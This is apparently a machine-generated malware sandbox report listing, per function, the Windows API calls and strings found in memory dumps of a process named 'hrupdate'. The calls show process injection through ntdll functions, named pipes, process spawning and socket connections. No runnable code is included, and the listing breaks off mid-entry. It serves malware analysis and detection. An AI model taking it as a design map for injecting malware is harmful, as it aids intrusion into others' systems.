                                      • API String ID: 1781926451-2556327735
                                      APIs
                                      • _malloc.LIBCMT ref: 046A4E67
                                        • Part of subcall function 046AEA1B: __FF_MSGBANNER.LIBCMT ref: 046AEA3E
                                        • Part of subcall function 046AEA1B: __NMSG_WRITE.LIBCMT ref: 046AEA45
                                        • Part of subcall function 046AEA1B: RtlAllocateHeap.NTDLL(00000000,?), ref: 046AEA92
                                      • _malloc.LIBCMT ref: 046A4E74
                                      • _malloc.LIBCMT ref: 046A4E8F
                                      • __snprintf.LIBCMT ref: 046A4EA2
                                      • _malloc.LIBCMT ref: 046A4EC1
                                      Strings
                                      • HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d, xrefs: 046A4E95
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Similarity
                                      • API ID: _malloc$AllocateHeap__snprintf
                                      • String ID: HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d
                                      • API String ID: 3929630252-2739389480
                                      APIs
                                        • Part of subcall function 0469F2E8: GetCurrentProcess.KERNEL32(?,0469AF55,?,0469AFAD), ref: 0469F2F4
                                      • GetLastError.KERNEL32(?,?,?,0469E106,00000000), ref: 04698C85
                                      • _malloc.LIBCMT ref: 04698CF4
                                      • _memset.LIBCMT ref: 04698D03
                                      • _memset.LIBCMT ref: 04698D34
                                      • GetLastError.KERNEL32 ref: 04698D62
                                      • _memset.LIBCMT ref: 04698D77
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Similarity
                                      • API ID: _memset$ErrorLast$CurrentProcess_malloc
                                      • String ID:
                                      • API String ID: 2196066725-0
                                      APIs
                                      • GetNamedPipeInfo.KERNELBASE(00000000,00000000,?,00000000,00000000), ref: 0469C11C
                                      • SetNamedPipeHandleState.KERNEL32(00000000,00000001,00000000,00000000), ref: 0469C133
                                      • Sleep.KERNEL32(000001F4), ref: 0469C189
                                      • GetLastError.KERNEL32 ref: 0469C1A2
                                      • SetNamedPipeHandleState.KERNEL32(00000000,00000001,00000000,00000000), ref: 0469C1BE
                                      • GetLastError.KERNEL32 ref: 0469C1C8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Similarity
                                      • API ID: NamedPipe$ErrorHandleLastState$InfoSleep
                                      • String ID:
                                      • API String ID: 1433407474-0
                                      APIs
                                      • GetLastError.KERNEL32 ref: 0469E306
                                      • UpdateProcThreadAttribute.KERNELBASE(00000000,00000000,00020000,?,00000004,00000000,00000000), ref: 0469E334
                                      • GetLastError.KERNEL32 ref: 0469E33E
                                      • GetCurrentProcess.KERNEL32(00000000,?,?,00000000,00000001,00000003), ref: 0469E376
                                      • GetCurrentProcess.KERNEL32(00000000,?,?,00000000,00000001,00000003), ref: 0469E39E
                                      • GetCurrentProcess.KERNEL32(00000000,?,?,00000000,00000001,00000003), ref: 0469E3BD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Similarity
                                      • API ID: CurrentProcess$ErrorLast$AttributeProcThreadUpdate
                                      • String ID:
                                      • API String ID: 1014270282-0
                                      APIs
                                      • accept.WS2_32(?,00000000,00000000), ref: 00B10A19
                                      • recv.WS2_32(?,?,00000001,00000002), ref: 00B10A44
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3896804996.0000000000B10000.00000020.00000800.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b10000_hrupdate.jbxd
                                      Similarity
                                      • API ID: acceptrecv
                                      • String ID:
                                      • API String ID: 1078442044-0
                                      APIs
                                      • _malloc.LIBCMT ref: 0469BB53
                                        • Part of subcall function 046AEA1B: __FF_MSGBANNER.LIBCMT ref: 046AEA3E
                                        • Part of subcall function 046AEA1B: __NMSG_WRITE.LIBCMT ref: 046AEA45
                                        • Part of subcall function 046AEA1B: RtlAllocateHeap.NTDLL(00000000,?), ref: 046AEA92
                                      • htonl.WS2_32(046DA6C0), ref: 0469BB5D
                                      • htonl.WS2_32(00000000), ref: 0469BB67
                                      • htonl.WS2_32(00000000), ref: 0469BB72
                                      • WaitForSingleObject.KERNEL32(00000000,00000000,00000000,00000000,046DA6C0,00000001,00000000,00000000,046948C6), ref: 0469BBD1
                                      • _memset.LIBCMT ref: 0469BC02
                                        • Part of subcall function 0469BCE9: PeekNamedPipe.KERNEL32(00000000,00000000,00000004,046948C6,00000000,00000000,00000001,046DA6C0,00000000,046DA6C0,00000001,00000000,00000000,046948C6), ref: 0469BD21
                                        • Part of subcall function 0469BCE9: htonl.WS2_32(?), ref: 0469BD3F
                                        • Part of subcall function 0469BCE9: PeekNamedPipe.KERNEL32(00000008,?,00000004,00000004,00000008,00000000), ref: 0469BD8E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Similarity
                                      • API ID: htonl$NamedPeekPipe$AllocateHeapObjectSingleWait_malloc_memset
                                      • String ID:
                                      • API String ID: 3572882391-0
                                      APIs
                                      • GetModuleHandleA.KERNEL32(ntdll.dll,NtMapViewOfSection,00000000,?,00000000,?,0469B0D7,00000000,00000000,00000000), ref: 0469B463
                                      • GetProcAddress.KERNEL32(00000000), ref: 0469B46A
                                      • GetLastError.KERNEL32(?,0469B0D7,00000000,00000000,00000000), ref: 0469B4D4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Similarity
                                      • API ID: AddressErrorHandleLastModuleProc
                                      • String ID: NtMapViewOfSection$ntdll.dll
                                      • API String ID: 4275029093-3170647572
                                      APIs
                                      • _initialize_onexit_table.API-MS-WIN-CRT-RUNTIME-L1-1-0(00676558), ref: 006733A2
                                      • _initialize_onexit_table.API-MS-WIN-CRT-RUNTIME-L1-1-0(00676564), ref: 006733B1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3896617863.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                      • Associated: 00000000.00000002.3896582194.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896648026.0000000000674000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896669818.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896684082.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896684082.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_670000_hrupdate.jbxd
                                      Similarity
                                      • API ID: _initialize_onexit_table
                                      • String ID: Xeg$deg
                                      • API String ID: 2450287516-1437564310
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _memset$_strncpy
                                      • String ID:
                                      • API String ID: 3537405232-0
                                      • Opcode ID: ceb812755fb89d2f77326bd70518b4a1071beb148d97ab0962bfaec6eca3e149
                                      • Instruction ID: 1284c4178876f8ec516f557f711f15452892779bb6f3264b973382baddcfd54f
                                      • Opcode Fuzzy Hash: ceb812755fb89d2f77326bd70518b4a1071beb148d97ab0962bfaec6eca3e149
                                      • Instruction Fuzzy Hash: 4581C172D00209ABEF12DB64D844FEE77FCAB04318F5445AAE516AB281F7B1FE048B54
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _memset$_strncpy
                                      • String ID:
                                      • API String ID: 3537405232-0
                                      • Opcode ID: 98e570df8f27764c94a0a27d41fd18048173302addea7886ff6356281b5acf94
                                      • Instruction ID: 2c09ae495c6e0d918fc20eccc60cbcbcff1caf81bfb64e8c542982d9accc68cf
                                      • Opcode Fuzzy Hash: 98e570df8f27764c94a0a27d41fd18048173302addea7886ff6356281b5acf94
                                      • Instruction Fuzzy Hash: DC51BA72D4424AAAEF10DAE0DC41FEE77FCEB00308F008476E515AB185FA75BE468B54
                                      APIs
                                      • _memset.LIBCMT ref: 04697A00
                                        • Part of subcall function 046A4DDD: htonl.WS2_32(?), ref: 046A4E37
                                        • Part of subcall function 046A4DDD: htonl.WS2_32(?), ref: 046A4E41
                                      • GetLocalTime.KERNEL32(?), ref: 04697A28
                                      • GetLocalTime.KERNEL32(?), ref: 04697A72
                                      • GetLocalTime.KERNEL32(?), ref: 04697ABA
                                      • GetCurrentDirectoryA.KERNEL32(00000800,00000000), ref: 04697AE2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LocalTime$htonl$CurrentDirectory_memset
                                      • String ID:
                                      • API String ID: 1947157357-0
                                      • Opcode ID: 229bb2572fa41ec3ccd13440f2da7813074716d69917c9d81c1a16a6cd8191e5
                                      • Instruction ID: eef8b39de4ce7bd9b435b5a53d072668003d1cd18d24e92d89c8294c8677c828
                                      • Opcode Fuzzy Hash: 229bb2572fa41ec3ccd13440f2da7813074716d69917c9d81c1a16a6cd8191e5
                                      • Instruction Fuzzy Hash: BF31D872D00209AAEF20ABF4D809BEE77ACDF11715F104466E510EA0C1FE78EF518E54
                                      APIs
                                      • CreateProcessAsUserA.ADVAPI32(046DAF5C,00000000,0469E106,00000000,00000000,00000001,3D8359EC,00000000,00000000,458D0874,55FF50D4,?,?,00000011,0469919B,?), ref: 046990C9
                                      • GetLastError.KERNEL32(?,?,0469E106,?), ref: 046990D9
                                      • GetLastError.KERNEL32(?,?,0469E106,?), ref: 046990F3
                                        • Part of subcall function 04698E95: _memset.LIBCMT ref: 04698EC3
                                        • Part of subcall function 04698E95: _memset.LIBCMT ref: 04698EDF
                                      • CreateProcessA.KERNEL32(00000000,0469E106,00000000,00000000,00000001,3D8359EC,00000000,00000000,458D0874,55FF50D4,?,?,00000011,0469919B,?,?), ref: 04699118
                                      • GetLastError.KERNEL32(?,?,0469E106,?), ref: 04699122
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$CreateProcess_memset$User
                                      • String ID:
                                      • API String ID: 3779600536-0
                                      • Opcode ID: 0802a6bdd006f54d330528531eb2992a32f49a17ba4d0c257da6d91fd5c5f90e
                                      • Instruction ID: 6e3006de87bbf438d19a7bd745a680d179ff59700d8d41f7f82e2a8914eaaa5f
                                      • Opcode Fuzzy Hash: 0802a6bdd006f54d330528531eb2992a32f49a17ba4d0c257da6d91fd5c5f90e
                                      • Instruction Fuzzy Hash: D71182B1200640BEDF315EA2DC48D677BFEFBC6B44B10481DF55280210F6A6AC55EA20
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 0469DBC0
                                      • GetTickCount.KERNEL32 ref: 0469DBD8
                                      • shutdown.WS2_32(676494AD,00000002), ref: 0469DBF3
                                      • shutdown.WS2_32(676494AD,00000002), ref: 0469DC00
                                      • closesocket.WS2_32(676494AD), ref: 0469DC05
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CountTickshutdown$closesocket
                                      • String ID:
                                      • API String ID: 3414035747-0
                                      • Opcode ID: 9cec19ef55674a453c4847f9bf0135c0215e73e1dc0bb7573f76d3cd30ecfbc8
                                      • Instruction ID: 27ca757af445f0457b357bd7808382c65b914c7422b26957245b45e77eaa69b3
                                      • Opcode Fuzzy Hash: 9cec19ef55674a453c4847f9bf0135c0215e73e1dc0bb7573f76d3cd30ecfbc8
                                      • Instruction Fuzzy Hash: F9116DB1900B11CFEF709E38E804A26B3E8FB15755B004A3ED48A93A48F7B5FC018B90
                                      APIs
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00B1086E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3896804996.0000000000B10000.00000020.00000800.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b10000_hrupdate.jbxd
                                      Similarity
                                      • API ID: FreeVirtual
                                      • String ID:
                                      • API String ID: 1263568516-0
                                      • Opcode ID: 032615ee799a844b4eaf843d42a166f93b94703b2570c5b761f403b1acabe3f2
                                      • Instruction ID: 82bb5ce020ff25e21905689b972060fb409ceee34f72a61e7d36b9a7b2b3ac73
                                      • Opcode Fuzzy Hash: 032615ee799a844b4eaf843d42a166f93b94703b2570c5b761f403b1acabe3f2
                                      • Instruction Fuzzy Hash: F5211434A14245EBCB04DF58C588FE57BA6FB48344F94C1A8EA495F241CBB1E9C5CBE0
                                      APIs
                                        • Part of subcall function 046A3BBA: _memset.LIBCMT ref: 046A3C43
                                      • GetLastError.KERNEL32(759223A0,?,?,?,0469BE7B,?,-0000EA60,?,?,04697D15,?,?), ref: 0469BDC3
                                      • WaitNamedPipeA.KERNEL32(?,00002710), ref: 0469BDD8
                                      • SetNamedPipeHandleState.KERNEL32(04697D15,?,00000000,00000000,?,?,?,0469BE7B,?,-0000EA60,?,?,04697D15,?,?), ref: 0469BE01
                                      • DisconnectNamedPipe.KERNEL32(04697D15,?,?,?,0469BE7B,?,-0000EA60,?,?,04697D15,?,?), ref: 0469BE0D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: NamedPipe$DisconnectErrorHandleLastStateWait_memset
                                      • String ID:
                                      • API String ID: 1374046827-0
                                      • Opcode ID: 067cc0a7c09312d3b80d176b55c1e4d7bb19dd1fbcfbc30aa2d95ea1d4bf2dfa
                                      • Instruction ID: f4eceb209d15ba7c87fb0769b458f7eb640ec8f6104460ccb98ce21be126b49d
                                      • Opcode Fuzzy Hash: 067cc0a7c09312d3b80d176b55c1e4d7bb19dd1fbcfbc30aa2d95ea1d4bf2dfa
                                      • Instruction Fuzzy Hash: 2C018471604001EEEF101F65EC08ABA7BEDFF05B90B104929F545D9191FAB1AC519E20
                                      APIs
                                      • __getptd.LIBCMT ref: 046B6CEA
                                        • Part of subcall function 046B061D: __getptd_noexit.LIBCMT ref: 046B0620
                                        • Part of subcall function 046B061D: __amsg_exit.LIBCMT ref: 046B062D
                                      • __amsg_exit.LIBCMT ref: 046B6D0A
                                      • __lock.LIBCMT ref: 046B6D1A
                                      • InterlockedDecrement.KERNEL32(?), ref: 046B6D37
                                      • InterlockedIncrement.KERNEL32(04CF1668), ref: 046B6D62
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                      • String ID:
                                      • API String ID: 4271482742-0
                                      • Opcode ID: 50869143addffde63586969ddd9d5d43336dbc5225eeaba8788eb10cd3adbc47
                                      • Instruction ID: 7f8fcad35b065eb8f06ada20eaa1f56604a948ac2d294db29f6e935b1d4b8f25
                                      • Opcode Fuzzy Hash: 50869143addffde63586969ddd9d5d43336dbc5225eeaba8788eb10cd3adbc47
                                      • Instruction Fuzzy Hash: 65018431E00B21A7DB20AF24D4057ED7760EF01B24F14054AD490A7680FB3879D1CFDA
                                      APIs
                                      • socket.WS2_32(00000002,00000001,00000000), ref: 04697B84
                                      • gethostbyname.WS2_32(?), ref: 04697B98
                                      • htons.WS2_32(?), ref: 04697BC1
                                      • connect.WS2_32(00000000,?,00000010), ref: 04697BD1
                                      • closesocket.WS2_32(00000000), ref: 04697BDB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: closesocketconnectgethostbynamehtonssocket
                                      • String ID:
                                      • API String ID: 530611402-0
                                      • Opcode ID: 8c3c2bd4798a79f9a0cf09cc9962df59210a1319322d26f080d932f51fe67372
                                      • Instruction ID: ef706c3fab9cc74f9e9666ab50fb212d82ccaaf7a743cbcdd2b67e123c30e2f0
                                      • Opcode Fuzzy Hash: 8c3c2bd4798a79f9a0cf09cc9962df59210a1319322d26f080d932f51fe67372
                                      • Instruction Fuzzy Hash: 17F06D25A10219AAEE107BB48C06FEE77AC9F10728F044655F965AA2D5F7B0F94083E9
                                      APIs
                                      • __lock.LIBCMT ref: 046AE95C
                                        • Part of subcall function 046B1075: __mtinitlocknum.LIBCMT ref: 046B108B
                                        • Part of subcall function 046B1075: __amsg_exit.LIBCMT ref: 046B1097
                                        • Part of subcall function 046B1075: RtlEnterCriticalSection.NTDLL(?), ref: 046B109F
                                      • ___sbh_find_block.LIBCMT ref: 046AE967
                                      • ___sbh_free_block.LIBCMT ref: 046AE976
                                      • HeapFree.KERNEL32(00000000,?,046C95B0,0000000C,046B1056,00000000,046C9760,0000000C,046B1090,?,?,?,046BC35D,00000004,046C9A70,0000000C), ref: 046AE9A6
                                      • GetLastError.KERNEL32(?,046BC35D,00000004,046C9A70,0000000C,046B7A28,?,?,00000000,00000000,00000000,?,046B05CF,00000001,00000214), ref: 046AE9B7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                      • String ID:
                                      • API String ID: 2714421763-0
                                      • Opcode ID: 261b1f6c56f1502dbb40fc6f81c5490ee20d3b3bc17996db55e7cc90c68e683b
                                      • Instruction ID: 24f2442ed42dace21bbc3a1ff21a4e321d9dbfb6fe0e55a2555e0680b6f12814
                                      • Opcode Fuzzy Hash: 261b1f6c56f1502dbb40fc6f81c5490ee20d3b3bc17996db55e7cc90c68e683b
                                      • Instruction Fuzzy Hash: C001A231981B15AAEB30BF70D808BDE3A64DF027A8F10114DE444A6180FE39BC91CF98
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 0469C70B
                                      • GetTickCount.KERNEL32 ref: 0469C712
                                      • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 0469C725
                                      • Sleep.KERNEL32(0000000A), ref: 0469C736
                                      • GetTickCount.KERNEL32 ref: 0469C73C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CountTick$NamedPeekPipeSleep
                                      • String ID:
                                      • API String ID: 1593283408-0
                                      • Opcode ID: 113f8be80ec3967db2366ba072c34bdcc77bb3b9a41b5a09276811d8da61a5ab
                                      • Instruction ID: 83791948a195717184f838a9f391cd3665304f43676236a3b5b9c6d09a809eff
                                      • Opcode Fuzzy Hash: 113f8be80ec3967db2366ba072c34bdcc77bb3b9a41b5a09276811d8da61a5ab
                                      • Instruction Fuzzy Hash: A5F01272710118BFEF015AA9DC848BE77EEDB46695B140836F601D7501F7B4AD429BA0
                                      APIs
                                      • _memset.LIBCMT ref: 046A3C43
                                      • SetLastError.KERNEL32(00000001), ref: 046A3D6D
                                      • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,04697D15,00000000,00000000,04697D15,00000000,?,0469BDEB,?,00000000,759223A0), ref: 046A3D88
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateErrorFileLast_memset
                                      • String ID: /v
                                      • API String ID: 2444439657-2755232556
                                      • Opcode ID: 5d7f1562952fe6a0cf27be315c0925c4f75ea138dded658f9fbeaac41b7cdee4
                                      • Instruction ID: 7c5758cdc519cbc936e83696768cde3ed06ddbab633903af3ceaa5407ed9e334
                                      • Opcode Fuzzy Hash: 5d7f1562952fe6a0cf27be315c0925c4f75ea138dded658f9fbeaac41b7cdee4
                                      • Instruction Fuzzy Hash: B4517D71D01618EBDB21DFA4D841ADEBBB9FB08750F105156E605F7240E734AE94CFA1
                                      APIs
                                      • GetModuleHandleA.KERNEL32(00000000,00000008,00000000,00000001), ref: 04696646
                                      • LoadLibraryA.KERNEL32(00000000), ref: 04696651
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 04696659
                                        • Part of subcall function 04696B06: _vswprintf_s.LIBCMT ref: 04696B22
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressHandleLibraryLoadModuleProc_vswprintf_s
                                      • String ID: %s!%s
                                      • API String ID: 2092861438-2935588013
                                      • Opcode ID: bde06cd086e9320f8f02fbcd96365bb6f33ec0c2a1bc6e6f62ee81ef2495d9c6
                                      • Instruction ID: ee97cd1fb66f6324134e87b4e450d8d432fc97582637d2cbd45b175a8abacc13
                                      • Opcode Fuzzy Hash: bde06cd086e9320f8f02fbcd96365bb6f33ec0c2a1bc6e6f62ee81ef2495d9c6
                                      • Instruction Fuzzy Hash: 6B41F3B2A042109BEF18CF60C584A6A77FDEB54360F25405ADA02AB385FBB4FC02CB55
                                      APIs
                                      • GetCurrentProcess.KERNEL32(?,?,046960E2,046DA64C,000002F0,?,00000000,0469632B,?,00000001,?,00000008,00000001), ref: 046A35B0
                                        • Part of subcall function 0469A042: _malloc.LIBCMT ref: 0469A048
                                        • Part of subcall function 04699F1A: _malloc.LIBCMT ref: 04699F5B
                                        • Part of subcall function 04699F1A: _memset.LIBCMT ref: 04699F6C
                                        • Part of subcall function 04699F1A: _memset.LIBCMT ref: 04699FB7
                                        • Part of subcall function 04699F1A: _memset.LIBCMT ref: 0469A00C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _memset$_malloc$CurrentProcess
                                      • String ID: 0-v
                                      • API String ID: 2562913181-620404996
                                      • Opcode ID: 881f41b36a4a6e576871e8e1491b60078e213c58b7c0a5cbe2fd437e47505c32
                                      • Instruction ID: 926b85a797b6e23d5b7e9a71c1fd83da27f3e5522f6e61376ac5af2c9d8728c0
                                      • Opcode Fuzzy Hash: 881f41b36a4a6e576871e8e1491b60078e213c58b7c0a5cbe2fd437e47505c32
                                      • Instruction Fuzzy Hash: EB11A971A416096FEF149FA8FC44BA937D9EB09364F105459FA088A781FB79ECA0CE50
                                      APIs
                                      • _memset.LIBCMT ref: 046A1A9D
                                      • GetCurrentProcess.KERNEL32(04695C1C), ref: 046A1AB7
                                        • Part of subcall function 046A19FA: _memset.LIBCMT ref: 046A1A14
                                        • Part of subcall function 046A19FA: __snprintf.LIBCMT ref: 046A1A73
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _memset$CurrentProcess__snprintf
                                      • String ID: system32$syswow64
                                      • API String ID: 3270679572-3098820961
                                      • Opcode ID: 5e1dff853485e2356264185b788a019488daa93f1e7be2ea17759047c9e107f3
                                      • Instruction ID: 1062d58b7f5d4c72ba1b276587dc09fceb9d6645271fb2f26352ca2e1e956e61
                                      • Opcode Fuzzy Hash: 5e1dff853485e2356264185b788a019488daa93f1e7be2ea17759047c9e107f3
                                      • Instruction Fuzzy Hash: 1DF08231644B047EFB04AB50EC06BF93248EF12719F14415DFA09563C1FEAABD508DAD
                                      APIs
                                      • GetModuleHandleA.KERNEL32(ntdll.dll,RtlCreateUserThread,?,?,?,0469ADD1,?,00000000,0469AF20,00000000,?,?,0469AF20,00000000,?,00000000), ref: 0469B6E0
                                      • GetProcAddress.KERNEL32(00000000), ref: 0469B6E7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressHandleModuleProc
                                      • String ID: RtlCreateUserThread$ntdll.dll
                                      • API String ID: 1646373207-2935400652
                                      • Opcode ID: 697a8f8fff3f1a1306e6b535903fd3fde5ccde3c7ea36cfafaafdf01725dd7b7
                                      • Instruction ID: c67fbb4ccf0227ec01c8c828d8ec572ac0ab83b7540bb17928e48afb6aeec63f
                                      • Opcode Fuzzy Hash: 697a8f8fff3f1a1306e6b535903fd3fde5ccde3c7ea36cfafaafdf01725dd7b7
                                      • Instruction Fuzzy Hash: 76F0A032901115FBCF00EFE1DC098EE7F69EF01A10B008504F40196100F278AB10DFE0
                                      APIs
                                      • _malloc.LIBCMT ref: 04699665
                                        • Part of subcall function 046AEA1B: __FF_MSGBANNER.LIBCMT ref: 046AEA3E
                                        • Part of subcall function 046AEA1B: __NMSG_WRITE.LIBCMT ref: 046AEA45
                                        • Part of subcall function 046AEA1B: RtlAllocateHeap.NTDLL(00000000,?), ref: 046AEA92
                                      • __snprintf.LIBCMT ref: 04699679
                                      • RemoveDirectoryA.KERNEL32(00000000), ref: 04699688
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateDirectoryHeapRemove__snprintf_malloc
                                      • String ID: %s\%s
                                      • API String ID: 3163426766-4073750446
                                      • Opcode ID: 3ae1250d392db538c0f49c8971b95b5cf29181bc78ac7abeba04d109b085f114
                                      • Instruction ID: c2dfdee13d191998020813252c39efb1fe6b9889249f17ba0744d0794979a676
                                      • Opcode Fuzzy Hash: 3ae1250d392db538c0f49c8971b95b5cf29181bc78ac7abeba04d109b085f114
                                      • Instruction Fuzzy Hash: D8E09A36600614B6EB213A56EC08ABE7B6CDB82665F10402EF90C55200BAB67D619DBA
                                      APIs
                                      • GetModuleHandleA.KERNEL32(ntdll,NtQueueApcThread,?,0469AEB5,00000000,0469AF20), ref: 0469B2FB
                                      • GetProcAddress.KERNEL32(00000000), ref: 0469B302
                                      Strings
                                      Memory Dump Source
